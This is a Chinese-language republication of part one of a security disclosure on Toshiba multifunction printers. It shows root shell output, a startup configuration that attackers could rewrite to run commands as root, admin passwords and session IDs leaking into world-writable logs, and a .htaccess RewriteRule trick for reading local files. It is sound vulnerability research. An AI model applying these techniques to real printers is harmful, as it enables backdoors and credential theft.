bash-4.1# ls -la /home/SYSROM_SRC/build/release/bin/ssm.xml /home/SYSROM_SRC/build/thirdparty/bin/ssm.xml /home/SYSROM_SRC/build/common/bin/ssm.xml-rwxrwxrwx 1 root root 55245 Oct 7 2021 /home/SYSROM_SRC/build/common/bin/ssm.xmllrwxrwxrwx 1 root root 28 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/ssm.xml -> ../../thirdparty/bin/ssm.xmllrwxrwxrwx 1 root root 24 Mar 14 16:27 /home/SYSROM_SRC/build/thirdparty/bin/ssm.xml -> ../../common/bin/ssm.xmlroot
此文件用于在打印机启动时以 root 身份运行程序,并可用于重新定义打印机启动时以 root 身份运行的任何程序。此程序每 3 分钟运行一次。
攻击者可以远程写入额外的条目来启动恶意命令,该命令将在打印机启动时以 root 身份执行:
内容/home/SYSROM_SRC/build/common/bin/ssm.xml:
<?xml version="1.0" encoding="UTF-8"?>
<SSM xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="../../../LayerInterface/CI/ServiceStartupManager/SSM.xsd">
<!-- Start: CI Layer services -->
<Service>
<name>cischeduler</name>
<group/>
<exePath>./cischeduler</exePath>
<startupType>Automatic</startupType>
<enabled>1</enabled>
<ProcessGroup>TRUSTED</ProcessGroup>
<StartParameters>
<Param>-S</Param>
<Param>ramdisk</Param>
<Param>></Param>
<Param>/work/log/ci/cischeduler.log</Param>
</StartParameters>
</Service>
<Service>
<name>cipollproc</name>
<group/>
<exePath>./cipollproc</exePath>
<startupType>Automatic</startupType>
<enabled>1</enabled>
<ProcessGroup>TRUSTED</ProcessGroup>
<StartParameters>
<Param>></Param>
<Param>/work/log/ci/cipollproc.log</Param>
</StartParameters>
<StartupCondition>
<Condition>
<Service name="cischeduler" state="Ready"></Service>
</Condition>
</StartupCondition>
</Service>
[...]pspy32打印机运行分析:
2023/05/27 20:32:43 CMD: UID=0 PID=4228 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:43 CMD: UID=0 PID=4229 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:46 CMD: UID=0 PID=4230 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:46 CMD: UID=0 PID=4231 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:50 CMD: UID=0 PID=4232 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:50 CMD: UID=0 PID=4233 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:53 CMD: UID=0 PID=4234 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:53 CMD: UID=0 PID=4235 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:56 CMD: UID=0 PID=4236 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:32:56 CMD: UID=0 PID=4237 | ./cissm -T 7 -d ssm.xml
2023/05/27 20:32:56 CMD: UID=0 PID=4238 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
[...]
2023/05/27 20:35:26 CMD: UID=0 PID=4393 | ./cissm -T 7 -d ssm.xml
[...]
2023/05/27 20:37:56 CMD: UID=0 PID=4532 | ./cissm -T 7 -d ssm.xml
[...]
2023/05/27 20:39:56 CMD: UID=0 PID=4676 | ./cissm -T 7 -d ssm.xml
[...]
2023/05/27 20:42:19 CMD: UID=0 PID=4831 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:19 CMD: UID=0 PID=4832 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:22 CMD: UID=0 PID=4833 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:22 CMD: UID=0 PID=4834 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:25 CMD: UID=0 PID=4835 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:25 CMD: UID=0 PID=4836 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:26 CMD: UID=0 PID=4837 | ./cissm -T 7 -d ssm.xml
2023/05/27 20:42:27 CMD: UID=0 PID=4839 | sh -c ps -eo stat,comm | grep -e "^Z.*agent" -e "^Z.*ebx_dl" -e "^Z.*de_ipfax"
2023/05/27 20:42:27 CMD: UID=0 PID=4838 | sh -c ps -eo stat,comm | grep -e "^Z.*agent" -e "^Z.*ebx_dl" -e "^Z.*de_ipfax"
2023/05/27 20:42:29 CMD: UID=0 PID=4840 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:29 CMD: UID=0 PID=4841 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:32 CMD: UID=0 PID=4842 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 20:42:32 CMD: UID=0 PID=4843 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
[...]
攻击者可以远程攻击任何东芝打印机。
/home/SYSROM_SRC/build/common/bin/ssm.xml任何本地或远程攻击者都可以替换配置文件,以便在打印机启动时以 root 身份运行任何恶意程序。
攻击者可以对打印机安装后门。
详细信息 – 明文日志和不安全日志中存储的密码
据观察,密码存储在明文日志中。
一些日志存储在/ramdisk/work/log/al具有不安全权限的目录中,允许任何本地攻击者读取和修改这些文件:
bash-4.1# ls -laR /ramdisk/work/log/al/*-rw-rw-rw- 1 root trusted 42678 May 23 16:10 /ramdisk/work/log/al/accounting.log.0.txt-rw-rw-rw- 1 root trusted 2228 May 23 15:14 /ramdisk/work/log/al/address.log.0.txt-rw-rw-rw- 1 root trusted 6877 May 23 15:16 /ramdisk/work/log/al/alPanelStartLEDHandler.log.0.txt-rw-rw-rw- 1 root trusted 23536 May 23 16:10 /ramdisk/work/log/al/alPanelUIMessageHandler.log.0.txt-rw-rw-rw- 1 root trusted 79 May 23 15:14 /ramdisk/work/log/al/albluetooth.log.0.txt-rw-rw-rw- 1 root trusted 449 May 23 15:14 /ramdisk/work/log/al/alcloning.log.0.txt-rw-rw-rw- 1 root trusted 1594 May 23 15:14 /ramdisk/work/log/al/alcloudclient.log.0.txt-rw-rw-rw- 1 root trusted 987 May 23 15:14 /ramdisk/work/log/al/aldevauthmgmtplugin.log.0.txt-rw-rw-rw- 1 root trusted 307378 May 23 16:11 /ramdisk/work/log/al/aldeviceconfig.log.0.txt-rw-rw-rw- 1 root trusted 29171 May 23 15:16 /ramdisk/work/log/al/aldeviceservice.log.0.txt-rw-rw-rw- 1 root trusted 128 May 23 15:15 /ramdisk/work/log/al/aleSCL.log.0.txt-rw-rw-rw- 1 root trusted 474 May 23 15:14 /ramdisk/work/log/al/alexportimport.log.0.txt-rw-rw-rw- 1 root trusted 1437 May 23 15:14 /ramdisk/work/log/al/alfilestoragem.log.0.txt-rw-rw-rw- 1 root trusted 13465 May 23 16:11 /ramdisk/work/log/al/allicensemgmt.log.0.txt-rw-rw-rw- 1 root trusted 5380 May 23 15:14 /ramdisk/work/log/al/almaintenanceplugin.log.0.txt-rw-rw-rw- 1 root trusted 111 May 23 15:14 /ramdisk/work/log/al/alnfcplugin.log.0.txt-rw-rw-rw- 1 root trusted 4432 May 23 16:05 /ramdisk/work/log/al/alulm.log.0.txt-rw-rw-rw- 1 root trusted 682 May 23 15:14 /ramdisk/work/log/al/alvnclauncher.log.0.txt-rw-rw-rw- 1 root trusted 67235 May 23 16:08 /ramdisk/work/log/al/appmanager.log.0.txt-rw-rw-rw- 1 root trusted 31306 May 23 16:11 /ramdisk/work/log/al/authplugin.log.0.txt-rw-rw-rw- 1 root trusted 590 May 23 15:15 /ramdisk/work/log/al/bonjour.log.0.txt-rw-rw-rw- 1 root trusted 147834 May 23 16:15 /ramdisk/work/log/al/boserver.log.0.txt-rwxrwxrwx 1 root trusted 250542 May 23 16:14 /ramdisk/work/log/al/boserverEvent.log.28.txt-rw-rw-rw- 1 root trusted 1110 May 23 15:14 /ramdisk/work/log/al/cbamanager.log.0.txt-rw-rw-rw- 1 root trusted 98 May 23 15:14 /ramdisk/work/log/al/eBRlog.log.0.txt-rw-rw-rw- 1 root trusted 3311 May 23 15:15 /ramdisk/work/log/al/efile.log.0.txt-rwxrwxrwx 1 root trusted 567 May 23 16:10 /ramdisk/work/log/al/grpmgrplugin.log.0.txt-rw-rw-rw- 1 root trusted 2277 May 23 16:10 /ramdisk/work/log/al/hdm.log.0.txt-rw-rw-rw- 1 root trusted 206 May 23 15:15 /ramdisk/work/log/al/ifaxrx.log.0.txt-rw-rw-rw- 1 root trusted 1037 May 23 15:14 /ramdisk/work/log/al/jobcontroller.log.0.txt-rw-rw-rw- 1 root trusted 4714 May 23 15:41 /ramdisk/work/log/al/jtm.log.0.txt-rw-rw-rw- 1 root trusted 610 May 23 15:15 /ramdisk/work/log/al/logmanagerplugin.log.0.txt-rw-rw-rw- 1 root trusted 286932 May 23 15:23 /ramdisk/work/log/al/logretriever.log.0.txt-rw-rw-rw- 1 root trusted 214 May 23 15:15 /ramdisk/work/log/al/network-ipv6.log.0.txt-rw-rw-rw- 1 root trusted 22498 May 23 15:16 /ramdisk/work/log/al/nsm.log.0.txt-rw-rw-rw- 1 root trusted 169537 May 23 16:01 /ramdisk/work/log/al/panel.log.0.txt-rw-rw-rw- 1 root trusted 3403 May 23 15:15 /ramdisk/work/log/al/printmanager.log.0.txt-rw-rw-rw- 1 root trusted 26623 May 23 16:10 /ramdisk/work/log/al/prm.log.0.txt-rw-rw-rw- 1 root trusted 1264 May 23 15:15 /ramdisk/work/log/al/remoteApplication.log.0.txt-rw-rw-rw- 1 root trusted 565116 May 23 16:11 /ramdisk/work/log/al/renderer.log.2.txt-rw-rw-rw- 1 root trusted 2434 May 23 15:14 /ramdisk/work/log/al/reportmanager.log.0.txt-rw-rw-rw- 1 root trusted 426 May 23 15:14 /ramdisk/work/log/al/reportmsgr.log.0.txt-rw-rw-rw- 1 root trusted 20834 May 23 16:11 /ramdisk/work/log/al/restrictionmode.log.0.txt-rw-rw-rw- 1 root trusted 732 May 23 16:10 /ramdisk/work/log/al/rolemanagerplugin.log.0.txt-rw-rw-rw- 1 root trusted 12464 May 23 16:11 /ramdisk/work/log/al/securitysettingsplugin.log.0.txt-rw-rw-rw- 1 root trusted 19963 May 23 15:15 /ramdisk/work/log/al/sharedprint.log.0.txt-rw-rw-rw- 1 root trusted 159 May 23 15:15 /ramdisk/work/log/al/slp.log.0.txt-rw-rw-rw- 1 root trusted 798 May 23 15:15 /ramdisk/work/log/al/snmpd.log.0.txt-rw-rw-rw- 1 root trusted 12287 May 23 15:15 /ramdisk/work/log/al/stage2.log.0.txt-rw-rw-rw- 1 root trusted 5955 May 23 15:15 /ramdisk/work/log/al/swupdate.log.0.txt-rw-rw-rw- 1 root trusted 2306 May 23 15:14 /ramdisk/work/log/al/usb.log.0.txt-rw-rw-rw- 1 root trusted 1113 May 23 15:15 /ramdisk/work/log/al/usbprn.log.0.txt-rw-rw-rw- 1 root trusted 14238 May 23 16:10 /ramdisk/work/log/al/usermanagerplugin.log.0.txt-rw-rw-rw- 1 root trusted 2553 May 23 15:14 /ramdisk/work/log/al/viewplugin.log.0.txt/ramdisk/work/log/al/epfx:total 28drwxrwxrwx 4 root trusted 0 May 23 15:14 .drwxrwxrwx 5 root trusted 0 May 23 16:10 ..-rwxrwxrwx 1 root trusted 28010 May 23 16:08 eprocessframework.log.0.txtdrwxrwxrwx 2 apache trusted 0 May 23 15:14 httpd_worker_1711drwxrwxrwx 2 apache trusted 0 May 23 15:14 httpd_worker_1712/ramdisk/work/log/al/wsp:total 4drwxrwxrwx 2 root trusted 0 May 23 15:15 .drwxrwxrwx 5 root trusted 0 May 23 16:10 ..-rw-rw-rw- 1 root trusted 3600 May 23 16:14 alwsprint.log.0.txt/ramdisk/work/log/al/wsscn:total 4drwxrwxrwx 2 root trusted 0 May 23 15:15 .drwxrwxrwx 5 root trusted 0 May 23 16:10 ..-rw-rw-rw- 1 root trusted 1083 May 23 15:15 alwswsc.log.0.txtbash-4.1#
用户登录打印机时在日志中写入明文密码
当用户登录TopAccess Web界面时,密码将写入所有人都可读的日志中,如下所示。
使用密码以管理员身份登录PASSWORD-SECRET-PIERRE,我们可以看到密码保存在2个可供所有人读取的日志文件中:
-
/ramdisk/work/log/al/boserverEvent.log.*.txt -
/ramdisk/al/network/log/http.log
日志文件内的凭证泄漏:
bash-4.1# grep -ri PIER .
./work/log/al/boserverEvent.log.28.txt:<Evt><t>05/27 16:18:39443877</t><Set><sID>ContentWebServer_10.0.0.2.fda0f003cf95b852233893df36d9b1ff</sID><pID>8556</pID><pName>httpd</pName><SetValue><Payload XMLPayLoad = "true" overrideDelta = "true"><path></path><value><Authentication><UserCredential><userName>admin</userName><passwd>PASSWORD-SECRET-PIERRE</passwd><ipaddress>10.0.0.2</ipaddress><DepartmentManagement isEnable="false"><requireDepartment/></DepartmentManagement><domainName/><applicationType>TOP_ACCESS</applicationType></UserCredential></Authentication></value></Payload></SetValue></Set></Evt>
./al/network/log/http.log:[Fri May 27 16:18:39.519454 2023] [contentwebserver:debug] [pid 8556] ccontentwebserver.cpp(4175): [client 10.0.0.2:41700] PASSWORD-SECRET-PIERRE, referer: http://10.0.0.1:8080/TopAccessLogin.html?v=1670282309ta这些文件具有不安全的权限,允许任何用户检索密码和修改日志。
远程攻击者还可以使用预先认证的远程代码执行(以 root 或 apache 身份)和多个本地权限提升漏洞来修改这些文件。
bash-4.1# ls -la /ramdisk/al/network/log/http.log
ls -la /ramdisk/al/network/log/http.log -rw-rw-rw- 1 root trust 663910 5月27日 16:20 /ramdisk/al/network/log/http.log
bash-4.1# ls -la /ramdisk/work/log/al/boserverEvent.log.28.txt
ls -la /ramdisk/work/log/al/boserverEvent.log.28.txt -rwxrwxrwx 1 root trust 715841 5月27日 16:20 /ramdisk/work/log/al/boserverEvent.log.28.txt
bash-4.1#
修改密码时将明文密码写入日志
该密码可以在日志文件中找到(NEW-PASSWORD-PIERRE):
bash-4.1# grep -r NEW-PASSWORD-PIERRE .
./work/log/al/boserverEvent.log.28.txt:<Evt><t>05/27 16:22:22933938</t><Set><sID>ContentWebServer_10.0.0.2.63e5f73ea1d7ecf9cfd935393adb8b11</sID><pID>4974</pID><pName>httpd</pName><SetValue><Payload XMLPayLoad = "true" overrideDelta = "true"><path></path><value><UserManager><View><UpdateUser><User ID="10002"><Information><passwd>NEW-PASSWORD-PIERRE</passwd><UserSoftKeyboardDisplay>true</UserSoftKeyboardDisplay></Information></User></UpdateUser></View></UserManager></value></Payload></SetValue></Set></Evt>
bash-4.1#并且该日志文件还具有不安全的权限,允许任何用户检索密码或修改日志文件。
远程攻击者还可以使用预先认证的远程代码执行(以 root 或 apache 身份)和多个本地权限提升漏洞来修改这些文件。
bash-4.1# ls -la /ramdisk/work/log/al/boserverEvent.log.28.txt
ls -la /ramdisk/work/log/al/boserverEvent.log.28.txt -rwxrwxrwx 1 root trust 886685 5月 27日 16:23 /ramdisk/work/log/al/boserverEvent.log.28.txt
bash-4.1#
攻击者可以检索密码。
攻击者可以修改日志。
远程攻击者可以通过上传包含 RewriteRule(RewriteRule /pwned.txt file:/path/to/local/file)的 .htaccess 文件来检索凭据并绕过身份验证机制,使用预先认证的远程代码执行(以 root 或 apache 身份)和多个本地权限提升漏洞。
详细信息 – /ramdisk/work/log 目录中不安全的日志中泄露了身份验证会话
我们发现用于身份验证的会话 cookie 以明文日志形式存储。这些日志可供所有人读取,部分日志还可被任何本地攻击者随意修改。
一些日志存储在/ramdisk/work/log权限不安全的目录中。我们可以在里面找到身份验证会话(例如ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e)。
日志文件中的会话泄漏:
bash-4.1# pwd
/work/log
bash-4.1# grep -r '10.0.0.2.' *
[...]
./log/al/boserverEvent.log.26.txt:<Evt><t>05/30 15:50:21222835</t><Session "timerReset"><id>ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e</id><num>658</num><pID>2670</pID><pName>alappmanager</pName><newTimerValue>0</newTimerValue></Session></Evt>
./log/al/boserver.log.0.txt:05/30 15:50:05535294 Pid= 1657,Tid= 1784,cborepository.cpp: 5340:WRN:HANDLECMD_RES: Response of Command 'GetSettings' from Plugin to 'httpd' in SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).
./log/al/boserver.log.0.txt:05/30 15:50:05552743 Pid= 1657,Tid= 1783,cborepository.cpp: 4816:WRN:DELIVERCMD: Delegating Command 'LicenseEnableCheck' from 'httpd' to Plugin 'LicenseMgmt-0x9f' with SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).
./log/al/boserver.log.0.txt:05/30 15:50:05556758 Pid= 1657,Tid= 1785,cborepository.cpp: 5340:WRN:HANDLECMD_RES: Response of Command 'LicenseEnableCheck' from Plugin to 'httpd' in SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).
./log/al/boserver.log.0.txt:05/30 15:50:14741108 Pid= 1657,Tid= 1784,cborepository.cpp: 4816:WRN:DELIVERCMD: Delegating Command 'LicenseEnableCheck' from 'httpd' to Plugin 'LicenseMgmt-0x9f' with SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).
./log/al/boserver.log.0.txt:05/30 15:50:14745065 Pid= 1657,Tid= 1783,cborepository.cpp: 5340:WRN:HANDLECMD_RES: Response of Command 'LicenseEnableCheck' from Plugin to 'httpd' in SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).
./log/al/aldeviceconfig.log.0.txt: * SessionID : ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e
./log/al/aldeviceconfig.log.0.txt: * DeltaDocName : hdb:/ramdisk/al/tmp/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e/DiagnosticModeTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e
[...]
./log/al/aldeviceconfig.log.0.txt: * DeltaDocName : hdb:/ramdisk/al/tmp/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e/DiagnosticModeTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e
./log/al/sapp/python_settingapp.log:03/16 20:57:34966 Pid= 5653 Tid= 1820326768 tweens.py 176 WARNING Add session map. key = ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7 value = ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7
./log/al/sapp/python_settingapp.log:03/16 21:08:35016 Pid= 5653 Tid= 1675623280 tweens.py 347 WARNING Delete session map. key = ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7 value = ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7, length1
./log/al/authplugin.log.0.txt:05/30 15:16:07935854 Pid= 1872,UserAuthManger.cpp:11476:ERR:delta Doc Name::hdb:/ramdisk/al/tmp/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e/AuthenticationTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e
[...]
./log/al/renderer.log.1.txt:05/30 20:21:13780508 Pid= 1992,Tid= 2939,LegacyPanel/src/cpanelmanager.cpp: 2983:WRN:Rcv ST : 72 : 1c000001 : <?xml version="1.0" encoding="UTF-8"?><Notification><Payload model="pull"><path>SecurityConfiguration/SecuritySettings/isLoginReqd</path><sessionID>ContentWebServer_10.0.0.2.ab52ced8304357f2b382460bbdd797dc</sessionID><subscriptionID>1275</subscriptionID></Payload></Notification>
[...]
/log/al/prm.log.0.txt:05/30 15:18:16563007 Pid= 1885,Tid= 2163,manager.cpp: 1874:ERR:Delta Document hdb:/ramdisk/al/tmp/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e/PresentationResourcesTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e could not be opened. Creating it我们可以列出包含此类身份验证会话的文件:
-
log/al/aldeviceconfig.log.0.txt
-
log/al/appmanager.log.0.txt
-
log/al/appmanagerlibrary.log.0.txt
-
log/al/authplugin.log.0.txt
-
log/al/boserver.log.0.txt
-
log/al/boserverEvent.log.26.txt
-
log/al/epfx/eprocessframework.log.0.txt
-
log/al/prm.log.0.txt
-
log/al/renderer.log.0.txt
-
log/al/renderer.log.1.txt
-
log/al/renderer.log.2.txt
-
log/al/sapp/python_settingapp.log
-
log/al/webpanel/eapi.log.0.txt
使用 shell:
bash-4.1# grep -r '10.0.0.2.' * | sed -e 's#:# #' | awk '{ print $1 }' | sort | uniq
log/al/aldeviceconfig.log.0.txt
log/al/appmanager.log.0.txt
log/al/appmanagerlibrary.log.0.txt
log/al/authplugin.log.0.txt
log/al/boserver.log.0.txt
log/al/boserverEvent.log.26.txt
log/al/epfx/eprocessframework.log.0.txt
log/al/prm.log.0.txt
log/al/renderer.log.0.txt
log/al/renderer.log.1.txt
log/al/renderer.log.2.txt
log/al/sapp/python_settingapp.log
log/al/webpanel/eapi.log.0.txt
log/al/webpanel/python_ta.log这些文件具有不安全的权限,允许任何用户检索密码,并且某些文件可以被任何本地攻击者(或任何远程攻击者以 root 或 apache 身份使用预先认证的远程代码执行和多个本地权限提升漏洞)自由修改:
日志文件的不安全权限:
bash-4.1# for i in $(grep -r '10.0.0.2.' * | sed -e 's#:# #' | awk '{ print $1 }' | sort | uniq); do ls -la $i;done
-rw-r--r-- 1 apache trusted 177116 May 30 15:51 log/al/aldeviceconfig.log.0.txt
-rw-r--r-- 1 apache trusted 57508 May 30 15:51 log/al/appmanager.log.0.txt
-rwxrwxrwx 1 root trusted 285227 May 30 16:15 log/al/appmanagerlibrary.log.0.txt
-rw-r--r-- 1 apache trusted 8839 May 30 15:51 log/al/authplugin.log.0.txt
-rw-r--r-- 1 apache trusted 57082 May 30 15:51 log/al/boserver.log.0.txt
-rwxr-xr-x 1 apache trusted 850786 May 30 15:51 log/al/boserverEvent.log.26.txt
-rwxr-xr-x 1 apache trusted 18608 May 30 15:51 log/al/epfx/eprocessframework.log.0.txt
-rw-r--r-- 1 apache trusted 18151 May 30 15:51 log/al/prm.log.0.txt
-rwxrwxrwx 1 root trusted 1048682 May 30 19:28 log/al/renderer.log.0.txt
-rwxrwxrwx 1 root trusted 1048606 May 30 21:50 log/al/renderer.log.1.txt
-rw-r--r-- 1 apache trusted 527501 May 30 15:51 log/al/renderer.log.2.txt
-rwxrwxrwx 1 apache trusted 1958 May 30 21:08 log/al/sapp/python_settingapp.log
-rwxrwxrwx 1 root trusted 669880 May 30 16:15 log/al/webpanel/eapi.log.0.txt
-rwxrwxrwx 1 apache trusted 311373 May 30 15:53 log/al/webpanel/python_ta.log
攻击者可以检索身份验证会话。
远程攻击者可以通过上传包含 RewriteRule(RewriteRule /pwned.txt file:/path/to/local/file)的 .htaccess 文件来检索凭据并绕过身份验证机制,使用预先认证的远程代码执行(以 root 或 apache 身份)和多个本地权限提升漏洞。
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
原文始发于微信公众号(Ots安全):东芝多功能打印机 40 个漏洞挖掘过程(第一部分)
